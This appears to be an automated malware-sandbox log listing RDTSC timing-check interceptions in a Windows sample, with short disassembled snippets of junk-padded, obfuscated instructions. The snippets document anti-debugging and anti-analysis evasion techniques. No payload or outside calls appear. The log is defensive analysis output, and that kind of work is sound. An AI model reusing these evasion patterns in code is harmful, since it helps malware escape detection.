Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF50D second address: 9DF512 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF512 second address: 9DF518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF5A6 second address: 9DF5AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E25E2 second address: 9E25E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E25E6 second address: 9E2664 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F8A2C4FB298h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 push edi 0x00000025 jmp 00007F8A2C4FB29Fh 0x0000002a pop ebx 0x0000002b xor edi, dword ptr [ebp+12473B91h] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007F8A2C4FB298h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d push 00000000h 0x0000004f jns 00007F8A2C4FB29Ch 0x00000055 push eax 0x00000056 pushad 0x00000057 jne 00007F8A2C4FB298h 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E17E8 second address: 9E1808 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2664 second address: 9E2668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E1808 second address: 9E180C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E36AC second address: 9E36B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E462E second address: 9E4633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E394F second address: 9E3954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E5745 second address: 9E574F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF775 second address: 9EF779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EF779 second address: 9EF79D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F8A2C7FDC1Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFA6D second address: 9EFA8A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8A2C4FB2A5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFA8A second address: 9EFA94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFA94 second address: 9EFA9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFA9A second address: 9EFA9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9EFA9E second address: 9EFAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F45DB second address: 9F45E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F478B second address: 9F479C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4860 second address: 9F4864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA229 second address: 9FA231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA231 second address: 9FA25C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F8A2C7FDC20h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F8A2C7FDC16h 0x0000001a jns 00007F8A2C7FDC16h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8EA0 second address: 9F8EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F8A2C4FB2A5h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8EC3 second address: 9F8ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9452 second address: 9F945C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F8A2C4FB296h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F95B3 second address: 9F95CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007F8A2C7FDC16h 0x0000000c popad 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F95CA second address: 9F95D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F974B second address: 9F9750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9750 second address: 9F975A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8A2C4FB296h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F975A second address: 9F9795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jp 00007F8A2C7FDC16h 0x00000010 jmp 00007F8A2C7FDC21h 0x00000015 pop esi 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push esi 0x00000019 jc 00007F8A2C7FDC22h 0x0000001f jo 00007F8A2C7FDC16h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9909 second address: 9F991D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9A5F second address: 9F9A63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9D09 second address: 9F9D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8A2C4FB2A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F9ED8 second address: 9F9EDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA07A second address: 9FA080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA080 second address: 9FA086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FA086 second address: 9FA08B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE7C0 second address: 9FE7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE7C4 second address: 9FE7C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE7C8 second address: 9FE7D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F8A2C7FDC1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FEC05 second address: 9FEC0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FEC0B second address: 9FEC31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F8A2C7FDC24h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF09D second address: 9FF0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF0A3 second address: 9FF0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF241 second address: 9FF245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF245 second address: 9FF249 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF249 second address: 9FF24F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF3E4 second address: 9FF3E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FF3E9 second address: 9FF3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E19F second address: 98E1A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98E1A3 second address: 98E1A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE324 second address: 9FE329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE329 second address: 9FE32F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE32F second address: 9FE339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8A2C7FDC16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE339 second address: 9FE33D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FE33D second address: 9FE34D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F8A2C7FDC1Eh 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FC65 second address: 98FC9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 jl 00007F8A2C4FB2AAh 0x00000017 jmp 00007F8A2C4FB2A4h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FC9E second address: 98FCA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FCA4 second address: 98FCA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FCA8 second address: 98FCAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0627F second address: A0628B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8A2C4FB296h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0628B second address: A06295 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F8A2C7FDC16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06295 second address: A0629F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8A2C4FB296h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0629F second address: A062CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8A2C7FDC1Bh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F8A2C7FDC25h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A062CC second address: A062E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F8A2C4FB2A5h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC6D1 second address: 9B0965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 jmp 00007F8A2C7FDC1Ch 0x0000000c nop 0x0000000d jmp 00007F8A2C7FDC20h 0x00000012 call dword ptr [ebp+122D1CC5h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jo 00007F8A2C7FDC18h 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F8A2C7FDC22h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CCF23 second address: 9CCF39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CCF39 second address: 9CCF62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F8A2C7FDC22h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CCF62 second address: 9CCF84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edx 0x0000000b jne 00007F8A2C4FB29Ch 0x00000011 pop edx 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CCF84 second address: 9CCF8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD098 second address: 9CD09C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD09C second address: 9CD0A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD5BD second address: 9CD5E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD5E4 second address: 9CD5E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD852 second address: 9CD856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD856 second address: 9CD85A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD916 second address: 9CD91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD91A second address: 9CD9AE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8A2C7FDC16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d sub ecx, 712ECF1Eh 0x00000013 lea eax, dword ptr [ebp+1247A468h] 0x00000019 jmp 00007F8A2C7FDC24h 0x0000001e nop 0x0000001f jmp 00007F8A2C7FDC28h 0x00000024 push eax 0x00000025 push ebx 0x00000026 jmp 00007F8A2C7FDC26h 0x0000002b pop ebx 0x0000002c nop 0x0000002d pushad 0x0000002e movzx edx, si 0x00000031 mov al, B2h 0x00000033 popad 0x00000034 lea eax, dword ptr [ebp+1247A424h] 0x0000003a clc 0x0000003b nop 0x0000003c jmp 00007F8A2C7FDC1Ch 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 jmp 00007F8A2C7FDC22h 0x0000004a pushad 0x0000004b popad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD9AE second address: 9CD9B3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06625 second address: A06633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jno 00007F8A2C7FDC16h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06A2F second address: A06A33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06A33 second address: A06A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pop esi 0x0000000a jc 00007F8A2C7FDC1Ch 0x00000010 jno 00007F8A2C7FDC16h 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007F8A2C7FDC16h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06BC0 second address: A06BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8A2C4FB296h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06BCB second address: A06BD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F8A2C7FDC16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06BD5 second address: A06BF8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8A2C4FB29Ch 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8A2C4FB29Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06E78 second address: A06E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06E7E second address: A06E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06E82 second address: A06EB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F8A2C7FDC24h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 js 00007F8A2C7FDC16h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06EB7 second address: A06EBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06EBB second address: A06EF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8A2C7FDC16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007F8A2C7FDC1Fh 0x00000016 popad 0x00000017 popad 0x00000018 jc 00007F8A2C7FDC30h 0x0000001e push edi 0x0000001f push esi 0x00000020 pop esi 0x00000021 jng 00007F8A2C7FDC16h 0x00000027 pop edi 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A06EF1 second address: A06EF7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CE45 second address: A0CE49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CE49 second address: A0CE61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8A2C4FB29Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0CFD5 second address: A0CFDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1199E second address: A119A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
